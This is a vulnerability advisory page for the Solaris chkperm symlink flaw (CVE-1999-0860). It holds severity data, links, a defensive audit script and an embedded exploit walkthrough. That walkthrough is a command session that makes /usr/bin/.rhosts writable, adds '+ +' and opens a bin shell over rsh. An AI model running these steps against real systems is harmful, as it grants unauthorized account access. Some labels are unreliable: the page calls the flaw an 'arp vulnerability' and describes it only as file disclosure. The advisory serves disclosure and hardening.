CVE-1999-0860
CVSS 2.1
Published: 1999-12-01 00:00:00
Revised: 2008-09-09 08:36:03

[Original] Solaris chkperm allows local users to read files owned by bin via the VMSYS environmental variable and a symlink attack.


[CNNVD] Solaris arp vulnerability (CNNVD-199912-010)

        Solaris chkperm has a vulnerability. A local user can read files owned by bin via the VMSYS environment variable and a symlink attack.

- CVSS (base score)

CVSS score: 2.1 [LOW]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: NONE [no impact on system integrity]
Availability impact: NONE [no impact on system availability]
Access complexity: LOW [exploitation has no access restrictions]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:sun:solaris:2.5.1::ppc
cpe:/o:sun:solaris:2.6:hw5
cpe:/o:sun:solaris:2.6:hw3
cpe:/o:sun:solaris:2.6
cpe:/o:sun:solaris:7.0::x86
cpe:/o:sun:solaris:7.0
cpe:/o:sun:solaris:2.6:hw3:x86
cpe:/o:sun:solaris:2.6:hw5:x86
cpe:/o:sun:solaris:2.6::x86
cpe:/o:sun:solaris:2.5.1::x86
cpe:/o:sun:solaris:2.5.1

- OVAL (technical details for detection)

No matching OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0860
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0860
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199912-010
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/837
(UNKNOWN)  BID  837

- Vulnerability information

Solaris arp vulnerability
Low severity  Other
1999-12-01 00:00:00 2005-10-20 00:00:00
Local
        Solaris chkperm has a vulnerability. A local user can read files owned by bin via the VMSYS environment variable and a symlink attack.

- Advisories and patches

        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Vulnerability information (19235)

Solaris <= 7.0 chkperm Vulnerability (EDBID:19235)
solaris local
1996-12-05 Verified
0 Kevin L Prigge
N/A
source: http://www.securityfocus.com/bid/295/info

Solaris 2.4, 2.5, and 2.5.1 (possibly other versions) have a package called FACE (Framed Access Command Environment) installed. Included in the package is a program called chkperm which checks a file to see if the user has permission to use the FACE interface. This program is installed suid and sgid bin, and is trivially exploitable to compromise the bin account under Solaris 2.4.

Run chkperm in a directory that has world write privilege or in a directory that belongs to bin. chkperm on Solaris 2.5 seems to create a file called <gibberish characters> in the directory from where you execute it. chkperm needs write access for user bin (or group bin) to the directory from which you execute it. It also works the same with just 'chkperm -l'; you can set the environment variable VMSYS to anything.

You could then create the link (to .rhosts in the example) using the <gibberish characters> file name created by chkperm and accomplish the same result. 

% mkdir /tmp/foo
% mkdir /tmp/foo/lib
% chmod -R 777 /tmp/foo
% setenv VMSYS /tmp/foo
% umask 0000
% ln -s /usr/bin/.rhosts /tmp/foo/lib/.facerc
% /usr/vmsys/bin/chkperm -l -u foo
% ls -l /usr/bin/.rhosts
-rw-rw-rw- 2 bin bin 0 Nov 12 09:41 .rhosts
% echo "+ +" >> /usr/bin/.rhosts
% ls -l /usr/bin/.rhosts
-rw-rw-rw- 2 bin bin 4 Nov 12 09:41 .rhosts
% rsh -l bin localhost /bin/csh -i
Warning: no access to tty; thus no job control in this shell...
% id
uid=2(bin) gid=2(bin)


- Vulnerability information

6994
Solaris FACE chkperm VMSYS Environmental Variable Symlink Arbitrary File Disclosure
Local Access Required Information Disclosure, Input Manipulation
Loss of Confidentiality Workaround, Patch / RCS
Exploit Public

- Vulnerability description

Solaris chkperm utility contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a malicious user sets the VMSYS variable to a user writeable directory, creates a symlink to .facerc, then executes chkperm which will disclose the first five lines of the file given as an argument resulting in a loss of confidentiality.

- Timeline

1996-12-05 Unknown
1996-12-05 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Sun has released a patch (#109392-01) to address this vulnerability. In addition, this issue can be worked around by restricting permission to chkperm: chmod ug-s /usr/vmsys/bin/chkperm
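The workaround above is a one-line chmod, but an administrator usually wants a repeatable check that the set-id bits really are gone (and that nobody has restored them). The following POSIX shell script is an added example, not part of this advisory, of Sun's patch or of Solaris; it reads the mode string from `ls -ld` so it works on any system with a POSIX `ls`, and the only page-derived value it assumes is the binary path /usr/vmsys/bin/chkperm. The `demo` function exercises the audit on a constructed temporary file so it can be run where chkperm is not installed.

```shell
#!/bin/sh
# Added example: audit whether a binary still carries the setuid/setgid bits
# that the advisory's workaround (chmod ug-s /usr/vmsys/bin/chkperm) removes.
# Not part of the advisory or of Solaris; portable to any POSIX sh + ls.

# setid_bits FILE
# Prints one of: setuid+setgid, setuid, setgid, none, missing. Always returns 0
# so it is safe inside command substitution under `set -e`.
setid_bits() {
    f=$1
    if [ ! -e "$f" ]; then
        echo missing
        return 0
    fi
    # Columns of the ls -l mode string: 1=type, 2-4=user, 5-7=group, 8-10=other.
    # The user execute column shows 's'/'S' when setuid is set; the group
    # execute column shows 's'/'S' when setgid is set.
    mode=$(ls -ld "$f" | cut -c1-10)
    u=$(printf '%s\n' "$mode" | cut -c4)
    g=$(printf '%s\n' "$mode" | cut -c7)
    su=0; sg=0
    case "$u" in s|S) su=1 ;; esac
    case "$g" in s|S) sg=1 ;; esac
    if [ "$su" -eq 1 ] && [ "$sg" -eq 1 ]; then echo setuid+setgid
    elif [ "$su" -eq 1 ]; then echo setuid
    elif [ "$sg" -eq 1 ]; then echo setgid
    else echo none
    fi
}

# audit_chkperm FILE
# Returns 0 when the file is absent or has no set-id bits (workaround applied),
# 1 when it is still set-id and therefore still exposed to the symlink issue.
audit_chkperm() {
    bits=$(setid_bits "$1")
    case "$bits" in
        none)    echo "OK:   $1 has no set-id bits"; return 0 ;;
        missing) echo "SKIP: $1 is not installed"; return 0 ;;
        *)       echo "WARN: $1 is $bits; apply the workaround: chmod ug-s $1"; return 1 ;;
    esac
}

# demo
# Runs the audit on a constructed temporary file (not a real chkperm) before
# and after the workaround; returns 0 when both results are as expected.
demo() {
    tmp=$(mktemp) || return 3
    chmod 6755 "$tmp"            # mimic the shipped setuid+setgid bin install
    if audit_chkperm "$tmp"; then before=0; else before=1; fi
    chmod ug-s "$tmp"            # the advisory's workaround
    if audit_chkperm "$tmp"; then after=0; else after=1; fi
    rm -f "$tmp"
    [ "$before" -eq 1 ] && [ "$after" -eq 0 ]
}

# Usage: sh audit_chkperm.sh [PATH]
# With no argument it audits the path named in the advisory and then runs demo.
if [ $# -gt 0 ]; then
    audit_chkperm "$1"
else
    audit_chkperm /usr/vmsys/bin/chkperm
    demo
fi
```

Running the script with a path as its argument gives an exit status that a configuration-management or cron job can act on: 0 means the binary is absent or already hardened, 1 means the set-id bits are still present. Parsing `ls -ld` rather than `stat` was chosen because `stat` takes different options on Solaris, BSD and GNU systems, while the ten-character mode string is specified by POSIX.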

- References

- Vulnerability author

